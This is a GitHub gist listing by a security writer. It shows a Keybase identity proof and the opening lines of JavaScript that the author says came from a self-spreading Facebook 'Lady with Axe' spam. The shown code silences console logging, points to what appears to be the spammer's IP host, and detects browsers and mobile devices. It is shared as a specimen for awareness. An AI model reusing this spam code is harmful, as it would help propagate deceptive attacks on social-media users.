Skip to content

Instantly share code, notes, and snippets.

View novogeek's full-sized avatar

Krishna Chaitanya T novogeek

View GitHub Profile
@novogeek
novogeek / keybase.md
Created December 27, 2016 05:46
NovoGeek's Keybase Github proof

Keybase proof

I hereby claim:

  • I am novogeek on github.
  • I am novogeek (https://keybase.io/novogeek) on keybase.
  • I have a public key whose fingerprint is C97D 9410 D53C 4942 3127 2291 D6A1 08C7 933C C26E

To claim this, I am signing this object:

@novogeek
novogeek / Facebook-Lady-with-Axe-Spam
Last active December 18, 2015 16:29
This is a code snippet from one of the recent and popular spams on Facebook. The spam reads - "She lost control of the sharp axe and almost chopped her best friends head off. Click the link to watch the video". It mutates based on the browser being used, leveraging the hacks in each browser. I have recorded a video of how the spam spreads. Check…
var console = { log: function(){} };
var base_url = "http://64.79.76.226/~silali/watch/";
$.support.FormData = !!(window.FormData && window.ArrayBuffer && window.Uint8Array && window.Blob && Modernizr.canvas);
var isMobile = {
Android: function() {
return navigator.userAgent.match(/Android/i);
},
BlackBerry: function() {
return navigator.userAgent.match(/BlackBerry/i);
},